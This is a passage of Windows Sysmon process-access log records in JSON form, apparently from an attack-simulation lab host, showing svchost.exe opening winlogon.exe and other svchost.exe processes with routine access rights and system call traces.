:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2631,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 1636\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"1636","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2632,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 1236\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+4689|c:\\windows\\system32\\themeservice.dll+3fdd|c:\\windows\\system32\\themeservice.dll+3c53|c:\\windows\\system32\\themeservice.dll+2675|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"1236","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+4689|c:\\windows\\system32\\themeservice.dll+3fdd|c:\\windows\\system32\\themeservice.dll+3c53|c:\\windows\\system32\\themeservice.dll+2675|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2633,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2634,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2635,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D4CB0000}\r\nTargetProcessId: 1308\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D4CB0000}","TargetProcessId":"1308","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2636,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001058000100}\r\nTargetProcessId: 1840\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001058000100}","TargetProcessId":"1840","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2637,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2638,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2639,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 